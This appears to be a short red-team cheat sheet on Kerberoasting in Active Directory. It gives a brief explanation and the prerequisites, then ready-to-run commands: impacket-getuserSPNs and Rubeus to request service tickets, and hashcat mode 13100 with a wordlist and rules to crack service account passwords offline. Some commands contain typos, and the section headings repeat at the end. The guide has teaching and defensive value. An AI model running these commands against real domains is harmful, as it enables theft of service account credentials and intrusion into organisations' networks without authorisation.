Kerberoasting

About the Attack

When client requests service tickets to DC in order to access resource hosted by SPN, No ckecks are performed on DC to provide service ticket are encrypted using SPN's password hash. We get the ticket & bruteforce the password hash hence it is called Kerberosting.

Gear Up (Prereqs)

we need below information in order to perform this attack

User access i.e. User:Password/NT Password Hash Or Kerberos Ticket.
Domain Controller IP

1. Using Kali Linux

This command will be used when launching the attack from kali linux(Non Domain Joined host)

sudo impacket-getuserSPNs -request -dc-ip $IP domain.com/user -save -outputfile User_spn

Using Rubeus

rubeus.exe kerberost /outfile:hasehs.kerberost

Crack The Collected hash

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

We can also use custom rule or any other suitable wordlist.

About the Attack​

Gear Up (Prereqs)​

1. Using Kali Linux​

Using Rubeus​

Crack The Collected hash​

About the Attack

Gear Up (Prereqs)

1. Using Kali Linux

Using Rubeus

Crack The Collected hash